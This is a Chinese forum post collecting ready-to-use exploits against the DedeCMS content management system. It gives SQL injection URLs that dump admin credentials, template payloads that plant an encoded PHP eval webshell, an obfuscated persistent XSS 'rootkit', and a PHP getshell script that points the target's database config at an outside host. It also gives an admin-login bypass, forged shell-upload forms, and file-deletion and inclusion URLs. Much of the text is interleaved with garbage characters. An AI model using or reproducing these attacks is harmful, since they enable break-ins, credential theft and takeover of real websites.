dedecms漏洞总结

admin · 发表于 2012-10-18 10:42:14

Dedecms 5.6 rss注入漏洞% J7 s7 f' o- ?5 s- x
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=18 G; W7 D, T: s! M
; F! _( b) o3 c  k. o
) f) T/ b$ U" W/ G6 H+ b; |3 R
4 c: g# v/ s- T: o! U

$ P* M: v4 u* l- o& f4 E, G
+ \$ D3 w+ w6 E, D
7 Q0 z! v# i" w2 S/ M  k) j  T; K. a3 R, t- Z
, C/ N# A$ \7 `2 I
DedeCms v5.6 嵌入恶意代码执行漏洞
2 d7 N: f) I- [  [' J注册会员，上传软件：本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}1 c6 b; Z+ `, D/ E. t
发表后查看或修改即可执行) i* }) k' J1 J3 |, z) @
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}6 r& d- P. ~3 S7 v
生成x.php 密码xiao，直接生成一句话。% R* k2 O+ I# q1 k
+ S4 @2 r- b; d% F* H5 u. m

, F# f8 R. |. `/ T2 `( b) B" J. B1 z* K7 B) P# l: Z

( ]+ i5 w; q0 B0 D) S1 R4 [- ^" T" J9 p7 }

& S  b2 `4 g7 {0 x  {4 |. t2 S* T0 Y0 K" |  x( }4 o
; E) g, e& D& g" Y
Dede 5.6 GBK SQL注入漏洞' d$ D' l  k  K4 ]8 y
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';8 ?- E9 Q, Q# }2 |6 _
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞( Z2 L) h' }4 S/ t( {5 W8 U8 ?
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
% r' t& B# M9 i0 \7 J8 r& z1 C: _+ |9 W# h! K$ l
" x- f% i( `* G, {

% |* o" W/ n4 x9 b3 f! _4 c
9 n  I# K# m/ {
% \* ~! J2 G: n5 w5 ~7 P; a' o  n' \( J! q; e" X! \  s  n
DEDECMS 全版本 gotopage变量XSS漏洞
1 ]' i8 `+ @" s- C1.复制粘贴下面的URL访问，触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞，需关闭XSS筛选器。
, H; i/ n5 [! Khttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="  b2 _  o* `" p$ [$ W- N2 E7 u8 N

5 X8 q1 m3 L* t) U8 e: o+ A
9 F# l8 k" K" H$ ^, G! O7 @& z" C/ G2.关闭浏览器，无论怎么访问下面的任意URL，都会触发我们的XSS。
$ s2 O! ?. v/ `http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

color=Red]DeDeCMS(织梦)变量覆盖getshell3 ]: D0 r+ h9 [9 a; e
#!usr/bin/php -w
# k8 S$ S  w' C<?php7 b, ^4 ^6 y1 H8 b; K
error_reporting(E_ERROR);% n2 W) P7 r0 k7 t* [; K
set_time_limit(0);
0 g+ \, X, J; X! R: tprint_r('
! \; B: `7 M9 qDEDEcms Variable Coverage! J. Y( L' I' q& k! K
Exploit Author: www.heixiaozi.comwww.webvul.com
);
! f7 b3 B2 l# \. Secho "\r\n";  G3 K3 P  Y9 v( d9 q
if($argv[2]==null){
2 Z( C  v' |4 J' V% f( f) @1 yprint_r('+ b9 H  |3 x3 J% S
+---------------------------------------------------------------------------+
/ R" C+ Q4 l9 `# K5 V# \1 V5 NUsage: php '.$argv[0].' url aid path
6 F9 h, z5 d/ g8 M( C2 E) paid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/2 n5 ~4 V' ^( m! R2 D' F
Example:
( [( T# G7 l8 h; U3 M% l3 C- ?php '.$argv[0].' www.site.com 1 old8 F. _7 }7 O( T
+---------------------------------------------------------------------------+
- ^+ q' O& d+ X9 P');
& s0 s& c- g9 S4 U4 Z! F( c( ~exit;
( ^# n8 i: p, m: U5 F6 l  }. A5 h}$ e& h8 L8 c$ [5 k2 K% K0 t9 j
$url=$argv[1];. u2 x' ?' |+ B' b5 H& t. Q
$aid=$argv[2];
" V; J% X6 `" u$path=$argv[3];
( \) I/ N! g5 O2 s( h- C6 _$exp=Getshell($url,$aid,$path);1 f! k# k& l6 {* P  {
if (strpos($exp,"OK")>12){! ^; P' r; {9 D4 p! U
echo "# }+ ?2 S+ L1 i3 \8 X8 f+ F" O  V
Exploit Success \n";2 [' \5 P% Q3 t/ J% b
if($aid==1)echo "! J* o& {5 z. V0 ?7 C9 n6 Q
Shell:".$url."/$path/data/cache/fuck.php\n" ;! p5 O, Y6 @# b2 x6 b
3 V! B2 l2 J- ]" x
( H8 }5 ^5 l; M, @0 o+ k6 O7 U
if($aid==2)echo "( {2 a6 E' m. c! p
Shell:".$url."/$path/fuck.php\n" ;
: l! z! r$ n  Y( U
" y; A  w4 y+ m/ q% s* T  I! D# u  v. @0 x% [! ]1 r6 Q8 `' f% g  ]
if($aid==3)echo "8 }; {: R- o( U/ ?; i! e
Shell:".$url."/$path/plus/fuck.php\n";: A3 \: I* r  N* z+ v
/ Q! s5 @: ~0 u" C9 ~+ y

& k2 n: m- z! t( b& w}else{
1 X5 c" |- w3 y% `  Qecho "
) Y& Q  X: V! X5 ^3 aExploit Failed \n";$ C( x) s' w2 B0 k4 X  o
}7 `9 T8 F# H% \! v9 n7 f
function Getshell($url,$aid,$path){) f% P! R" H5 B7 R5 f; u
$id=$aid;
5 U6 {; R9 F6 v+ l: j5 ]$host=$url;& U0 A3 |6 ^! Y+ |* X
$port="80";% D7 T, T; C+ Z
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";/ C* k+ Q6 V' }, W- j; s
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$ P* v3 _% W% Z: C$data .= "Host: ".$host."\r\n";! ]; m+ q; o, N1 @4 ^) l
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";8 G; q) W! I  D
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";- ~4 v; w3 ~5 F; q* }; O
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
, z8 H) v5 [- J7 a  W//$data .= "Accept-Encoding: gzip,deflate\r\n";6 l) y. U3 z5 S6 T9 k) p0 C: g
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
: V7 [% N7 E9 M$data .= "Connection: keep-alive\r\n";
6 R0 z1 V* t0 N! R) l6 B$data .= "Content-Type: application/x-www-form-urlencoded\r\n";" a) ^7 G0 v( X* n1 P$ W: Y
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";1 j8 ]1 Z! T1 |# W0 ]1 ~0 Z3 X3 ]
$data .= $content."\r\n";+ O4 N5 Q6 x/ [6 E
$ock=fsockopen($host,$port);  B% Q" ]; d  j/ K1 K- E, p
if (!$ock) {3 w' e/ o; J7 s& m4 [+ g3 Y3 Y8 {# {
echo "
/ C6 Z, A; C/ E( j8 \No response from ".$host."\n";
3 ^2 k% i  _' b- J}
: A9 f& H( f* Q& yfwrite($ock,$data);
! u, C0 y8 u+ S* p9 {; t: H. Jwhile (!feof($ock)) {
8 v7 I$ N8 d5 @* {5 X0 Z$exp=fgets($ock, 1024);
+ S( u6 W& s. K. Treturn $exp;+ @/ H2 o6 j( A& L5 M3 s
}* U' a3 F6 N( G$ h% z, t' }1 m5 X
}4 d4 f4 j; S5 E8 t
  l: e* f7 J& C1 Z* S. M% ]

' @+ l$ g) e! a+ v9 p9 w?>. Z  i2 v# i2 a+ {8 \
: C3 p4 F& V% ]" ?  Q* G" p
! F" @4 V$ u, H7 F
5 `: J) f( l7 ]& ?8 ]

" }4 z7 h9 T% O3 t* n
+ F4 i# M+ W: D
9 \8 {) \, w+ }& T# M- k
* c; T( T: L* T3 H. `5 J/ S; J  R4 G( s" c3 m/ I  \0 F

% z# B' m4 j/ {7 z, H& N  v" y
3 M0 g/ w! L. r& T: \DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)0 K6 f) u8 f; t( R5 u" l
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root$ w# n, H; `: m0 m, w' ]- N

! B: x9 k  J+ u0 ~8 t. X' |2 V6 j) n. B8 [) {
把上面validate=dcug改为当前的验证码，即可直接进入网站后台  j; A& {2 ~) q8 I# i& ~

' \9 C0 d, P0 U' f* B7 y
- u  ?; w8 ?: m7 D) V. x* `此漏洞的前提是必须得到后台路径才能实现6 m! h: X: S0 M+ |9 e# l7 q

/ Y5 L( `, ^) A8 {( I+ `$ G2 d1 r5 ^; D8 d# e' ~- w' G

9 }# K% `; b* d, {' J0 O; ~- u7 ?) t

& l# j0 ^( X- [6 C! _
8 z- s$ i% s5 Y( w! ?6 c0 W4 X7 x# [1 i% o! t. B

( A7 W0 |5 ]5 c. |# M: P
! w# R, b/ S" h0 w6 \4 Z3 Q# K3 ?" I% M; ~# `+ f4 V5 j+ c
Dedecms织梦标签远程文件写入漏洞" ], J6 j; m, g; ?' J) a+ V
前题条件，必须准备好自己的dede数据库，然后插入数据： insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');  K  a6 M  e# O5 s& y

9 g) g6 g0 F% t$ r8 _  h4 Y% f$ F8 s7 f3 G& J( Z
再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。
7 W3 I" i9 x# N4 r7 \<form action="" method="post" name="QuickSearch" id="QuickSearch">% G1 B/ J& F7 b5 D3 `0 b
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />) A& P' h+ C+ q2 f! Y! H
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />8 Z) a4 l1 {) U2 F8 A$ c, U8 t$ v
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
. D2 |/ Z4 n8 K9 x. l<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
" d5 b- w" [. L7 X! g5 l2 M<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
% P* [6 P$ S( {9 l3 @<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />9 ?) S, [, z6 l2 h
<input type="text" value="true" name="nocache" style="width:400">
+ @4 S! L$ r3 s5 Z) I2 d9 h<input type="submit" value="提交" name="QuickSearchBtn"><br />7 o4 X; J' B8 f8 x& U
</form>- L  N' S" `; y4 K7 M2 m7 s0 M
<script>
$ A0 g$ |0 C% T8 y! Nfunction addaction()
3 B! }# I$ V4 N5 p# |  Z& f{
  T, H$ n$ R2 Cdocument.QuickSearch.action=document.QuickSearch.doaction.value;: T% o; f/ M) W! U& z2 n- r
}
+ f) f3 B# B) K' L( _</script>
& N' s8 d  {5 _5 g5 r
0 ~( M* [+ n* A' A# @% {6 q
- b$ j# C0 v. v+ @' K
. u4 x, a% m, W4 G5 [
" u, b& @* W+ Q4 h* `( E
* \/ k% a7 o3 ^2 b0 ~3 d& x1 t# V0 U' P

/ ~, _/ T6 z# g
4 h: L& Y3 Q: Y7 ^

+ [. V$ B! ]2 F. {* d# e, \DedeCms v5.6 嵌入恶意代码执行漏洞0 R7 H* H0 e/ p
注册会员，上传软件：本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，发表后查看或修改即可执行
( V+ |, T; A+ D- B. w# ]7 Y2 I2 i! Ra{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}  o, V9 L" O* v; G4 M, d* Y7 S8 n
生成x.php 密码：xiao直接生成一句话。密码xiao 大家懂得3 T9 [& D! X4 ]
Dedecms <= V5.6 Final模板执行漏洞! w& B6 f- T. n# s
注册一个用户，进入用户管理后台，发表一篇文章，上传一个图片，然后在附件管理里，把图片替换为我们精心构造的模板，比如图片名称是：% G* O$ `$ U0 \% p& u( T! `6 }
uploads/userup/2/12OMX04-15A.jpg+ l' h* w/ c( e/ J8 N

  j9 a% ^9 y4 K
  x3 [6 C6 W! `$ l6 }' C" r模板内容是（如果限制图片格式，加gif89a）：, D6 E8 b& O; i# q' B  M
{dede:name runphp='yes'}
1 j6 v( z; `; g* t% n+ K$fp = @fopen("1.php", 'a');5 A1 ^1 o9 P3 d0 m3 F# A
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
+ U. |- h7 F, N8 @@fclose($fp);
: l& V; ?: }+ h5 R. M0 Q{/dede:name}* G5 M4 }# c  w8 h6 E9 d
2 修改刚刚发表的文章，查看源文件，构造一个表单：
( D+ q: c3 x' |7 l9 p<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">+ y  }; q3 z* ^5 {8 S
<input type="hidden" name="dopost" value="save" />) f2 L( D2 [# F- Y' _" V
<input type="hidden" name="aid" value="2" />
* p: [# L. @7 R) K; q# @: L<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
, c/ h% [8 R9 Q  r<input type="hidden" name="channelid" value="1" />
5 z& g- o4 b+ K$ x  m9 s<input type="hidden" name="oldlitpic" value="" />
: D: S! n3 W  n$ t) O  |<input type="hidden" name="sortrank" value="1275972263" />
8 C7 ^5 q6 N2 k3 o1 y% J; Y
7 S. Z4 T! ^: d# A8 U8 F& C/ m- K% x7 O% y
<div id="mainCp">
: Z: D4 r6 ?) b' o! ]  J<h3 class="meTitle"><strong>修改文章</strong></h3>
% Y. O0 H: d( _. ~8 i7 G5 A$ x# u, S$ c: |0 B0 Q! X
( H; G( }6 g5 @# R! T) A
<div class="postForm">
6 z, s3 p) ?8 i/ f3 K<label>标题：</label>! f- W; Z% `. f" |( D
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
$ @! G0 O" t# i. t6 e  q
# A! L; C9 K% A# w# a
- F2 _* c# E1 ?& J0 D4 E* K9 |<label>标签TAG：</label>
( x0 A+ r& a6 C; Q# U<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)0 s. F" ?. Y1 ^1 q
6 b) u: q6 l) v8 r+ q, {

4 ]  ^" y& d. q6 o* {/ l4 X<label>作者：</label>
/ V2 z# [: f: l- D* ~6 V<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>% T' W3 |' l* r( @2 A% T+ {+ Q  c
: s0 l: X4 N; o% U  h- T
+ C8 g1 ?$ ^  ?/ b. i" j
<label>隶属栏目：</label>
" L/ X- B+ N7 q5 P8 \; h1 R3 _<select name='typeid' size='1'>0 n2 t2 O. f3 ?9 ]- P- j. ^
<option value='1' class='option3' selected=''>测试栏目</option>
) b& L5 H' P- _4 s& Q. u/ ]- _</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
; ?3 r; G  N- N% {5 u: U/ U3 l
: R3 Q, _7 S5 D7 {; U0 Q# N/ ~" t/ U9 f4 P" o& ?# U7 g( Y
<label>我的分类：</label>
$ q8 Y/ c9 \: r) O3 \; i<select name='mtypesid' size='1'>
+ F9 D0 k% T  N: F2 N5 H) t<option value='0' selected>请选择分类...</option>
7 B, f6 \+ o8 Y  d; m  O) @<option value='1' class='option3' selected>hahahha</option>
( Y6 r) k: I( r3 Q8 D" s3 E/ {</select>
# C! G# G, O2 H' C$ t" k$ I4 w* [* F+ ], w! l; w$ [
3 m+ n+ L! b/ d6 P6 ]1 R/ J
<label>信息摘要：</label>! Y0 |: F+ P; C0 K# r1 S2 x
<textarea name="description" id="description">1111111</textarea>6 r9 v! [7 e, @" m5 w2 Y
(内容的简要说明), [$ A6 @, v$ E: v) O, J" a

- l) y4 T- d( g, |& W4 [1 ]
6 u! ?9 I! q  f* a  l9 P<label>缩略图：</label>
  j% h/ `7 F' c; u<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>6 `* d6 p/ A: G- C: L
/ |1 ?% [# E4 p1 }7 F1 z/ ?

2 s& ^. F2 v: K; J& b( @<input type='text' name='templet'
% O6 |; ]  t! @+ I1 z/ g% b- u: wvalue="../ uploads/userup/2/12OMX04-15A.jpg">
. |) r; d3 W- j  T<input type='text' name='dede_addonfields'
  `/ ~4 n& d3 I/ o9 s" \value="templet,htmltext;">（这里构造）
- o2 C& r9 A7 G  L1 V& o</div>! w9 L2 g, \( ?0 ]' P$ }0 R  d7 _
' v' [' s. \* Z

% a& |/ B5 [% ^+ p- g- `+ l
1 @& h2 ?* p# q<h3 class="meTitle">详细内容</h3>
1 G* b* y2 P- g6 g/ I5 B. L- n6 R( p# M0 t7 W: F! u3 P* o; m- I) Y

7 j$ ]% G; `% c6 J  z4 p8 M<div class="contentShow postForm">. P- d* ]! T) a* @
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
! a4 |$ f: k% n" k4 y% G) B* [, y# x$ F& P6 A( `' x2 X
  }5 Z- o0 y1 r8 H1 w
<label>验证码：</label>
8 |1 O$ P/ d9 b( V/ L2 m! E<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />1 ~. q9 |( k; ~. o/ o1 a1 U; Y" C
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清？点击更换" align="absmiddle" style="cursor:pointer" />
  o3 v% `" @  Q$ Q: A/ \4 s' U$ {3 E$ Q0 s, P

% X3 z' F' @& g9 P<button class="button2" type="submit">提交</button>
; m  k6 V/ u9 Z9 \% X<button class="button2 ml10" type="reset">重置</button>/ V0 w2 `% E6 q5 z" b
</div>
5 p% L* z7 ?( i  C; z* S4 i, k& B$ B& }/ q9 Y1 b

5 L" C1 [9 R; J" b0 f; {# e</div>
/ F- {( F8 T+ Q  u( g
# I+ c9 H2 ~, \$ r! y0 p* x% g. W# c8 U+ n7 e
</form>
# h' V' D3 T; P4 c; f9 K7 Y( G$ D- Z' u* R
0 F$ X) |. T, x  s) C, ?: ]) l
提交，提示修改成功，则我们已经成功修改模板路径。 3 访问修改的文章：
6 J/ u5 Z" U8 ~假设刚刚修改的文章的aid为2，则我们只需要访问：
9 P5 O4 X: R: P6 u& u4 w0 Zhttp://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成webshell：1.php
) J. j; M3 a: K/ ~$ R: C9 E% Q; q* y- b% }
6 U" w1 n  ^* G3 @/ {' m

- [# W; X8 G  ^4 C# c, H
1 ]% g6 T: Y2 [# |. e( k5 |$ Z9 W7 W4 y9 A' D* T" |8 H

' a$ ^% L4 \# N5 F* g0 \
( y- N  S% M2 i. Y4 y8 e6 y( a3 n& U
  Y5 x1 H6 [9 |5 ~  @
2 b3 I2 f) l! K7 L7 D4 l
$ }! D( T. Z& c$ W

7 C0 a( _; T5 H* r& u2 l) D& G7 {DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)4 B/ J  L- u0 W; J
Gif89a{dede:field name='toby57' runphp='yes'}9 W9 C) ~" l) ]" G- ^
phpinfo();
5 @) b) _2 M. N: s( f2 w{/dede:field}
  S0 h: g2 g0 r+ j( t保存为1.gif
/ P8 i4 p/ t% E2 }<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
% y2 v5 Z* ?% g" j<input type="hidden" name="aid" value="7" /> ! r# Z5 h& `; a% J7 ~
<input type="hidden" name="mediatype" value="1" /> ( D8 B, ]* M9 w+ t7 j
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> ! W7 |" \. N0 A# A% x! {
<input type="hidden" name="dopost" value="save" />
6 P2 L! }. S' d+ @0 z<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
8 M2 _7 y  v3 C+ w7 G: q<input name="addonfile" type="file" id="addonfile"/> % |. F: T# v# M2 a7 Q' s, w' L
<button class="button2" type="submit" >更改</button> 3 e/ _& F% @5 T0 T- O
</form>
/ m$ h8 h- J) G
. ]) m/ ?9 g& `$ L$ q) Z8 Q
! l9 j5 s- n# U+ J* D: _8 V# g构造如上表单，上传后图片保存为/uploads/userup/3/1.gif
( e4 u5 ~: S, \$ H/ q  [6 y* N发表文章，然后构造修改表单如下：& u4 @8 ^2 Y! x3 h* X8 o, L
+ y1 L9 f( c* ]8 G; `5 I5 m. l% @
5 J6 F/ c7 W  R# z! R2 l
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> : a; ?. @+ Z. [+ v1 }, v
<input type="hidden" name="dopost" value="save" />
% S6 [0 c- R) N& H% U/ w) ?: z' t<input type="hidden" name="aid" value="2" />
9 F" D/ C0 ~4 ~5 t5 o& O& H' N<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
4 W/ F/ q% @$ E9 X# X" S<input type="hidden" name="channelid" value="1" />
, Q9 P9 }9 ^. Y! _3 X<input type="hidden" name="oldlitpic" value="" /> : M# W! K# o0 S! [, T0 u
<input type="hidden" name="sortrank" value="1282049150" />
3 C2 X- x0 M1 E5 h4 m<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> ) X0 F' L. z; |9 n1 |  `
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
+ }+ O' ]2 u4 D2 X<select name='typeid' size='1'>
+ o6 I! b9 D; o0 m/ ?6 @2 M<option value='1' class='option3' selected=''>Test</option> 6 d  |- A/ B* a6 {
<select name='mtypesid' size='1'> $ R$ ?) R- ^/ e$ o
<option value='0' selected>请选择分类...</option>
+ z& A. B, Y" r<option value='1' class='option3' selected>aa</option></select> 5 A1 x2 N; O( J" g) f! C
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
  H* P/ T& o4 a' }7 Y+ I<input type='hidden' name='dede_addonfields' value="templet"> / y2 S4 V0 s/ O( R( O" E8 p
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 1 h9 `) K' p  k+ U( j8 \
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
5 F1 t# l7 I+ v& r<button class="button2" type="submit">提交</button>
; K" s2 o) Y+ ^1 T% q  q</form>
( s! ^' h: O* M) S) x  w' d# M' U# t$ E7 n. g
6 B' L) m; ~# p) `

# N: O6 E0 v0 i; c( \0 X- F4 X& d$ e) [* |. I' x
7 p' T0 S) I/ `& _% B2 }- A
" a' P* x4 b5 S0 R0 K% g
7 s4 {0 u7 j+ b- g% i6 B0 [

5 m! f  b, Z* e9 [) W) ]; E, a  U( l% M8 O# Y

( \6 d* G+ P7 L& H0 `/ k+ h
7 A, s- j$ v7 M
5 Y6 c& {+ j# V$ M% z) N+ w  v3 ^& o织梦(Dedecms)V5.6 远程文件删除漏洞- ^( I' L  F0 `0 ?: N
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 ; X- U8 s/ a" a3 d& n
http://www.test.com/plus/carbuya ... urn&code=../../5 |; R8 K- F; q) [7 c( P
  S7 M/ U! h7 ]4 I8 W

' G% Z0 L* I. y5 M  K9 y, y" F  O) d8 A# F# Y* R. \. Z  ~( k

2 @( U9 f4 A  I, c1 [; ?' H" k' u3 {2 |. K# d9 {% X3 y

5 X* R; S+ P1 t4 x9 S" U) X" [1 N) B
' q+ X; T- e$ f  h

6 X. h" o" C# S$ i2 _8 B- h, J2 {% N! Y) \$ Z' t3 F
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 # `1 p+ ~) O3 A* E
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`" f" Q" M* @$ I% c9 v
密码是32位MD5减去头5位，减去尾七位，得到20 MD5密码，方法是，前减3后减1，得到16位MD5
4 \8 V3 W+ g3 f7 _
/ u2 x1 R" J* W# B1 W, o
& }) e. Y% W4 m0 q6 h; m: m# P
; V' A0 y9 A# m' B5 A+ F, w) u# }) ]& {
: q+ L6 U: d3 F3 v5 a4 ], Y

  t% R0 A! S$ T
+ H" V) x' v# \( w+ ^. h3 ^# f6 n- }9 o) Z( s* b% y

. ~+ R# O  T) j. B2 }( Q: i* ^; u8 {( n: \' B) u; e' }/ K3 {
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞7 A( U& b+ [* L$ C) v
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
+ z( l' A+ b7 p# h/ r. i7 O- r
1 D. V. ?0 }) g) ^; d0 U9 X
4 g8 g3 g* H" t9 B+ n1 R/ z

8 Y- b5 s( Y2 k4 V4 b4 T
: A; X; n2 l3 O" `6 O; H* v- [
- t& f2 c! h/ d2 P# f
" l# W: I9 |2 w) ~9 B. E3 ~7 l  i2 p* q! i9 o
2 \  Z* i8 ?+ m2 `. g/ m

9 p5 V9 s* J" [织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
- p- f" ~( X" @% A- \<html>
% ^8 g! d  s; ~7 Q8 m<head>3 ~% K' G6 a! O9 V* N
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>, `, A0 {: m+ s$ m/ F
</head>
' `. R$ `3 A, D8 J" i8 z<body style="FONT-SIZE: 9pt">7 G- G9 p. n& z  z. E+ e' n( ]& ]
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />- b* b0 N  S. W0 W4 F  R
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
& Y3 ]+ G. ^" Q# V0 l8 ^<input type='hidden' name='activepath' value='/data/cache/' />. m+ z, f4 j# S: l' \
<input type='hidden' name='cfg_basedir' value='../../' />
  A" }. r8 h1 g* s<input type='hidden' name='cfg_imgtype' value='php' />+ {% N  N8 J, a! [) K& c
<input type='hidden' name='cfg_not_allowall' value='txt' />1 u9 F. S0 X- E7 n* ^6 {2 c5 U4 D
<input type='hidden' name='cfg_softtype' value='php' />% w8 c9 M' }8 z9 G
<input type='hidden' name='cfg_mediatype' value='php' />
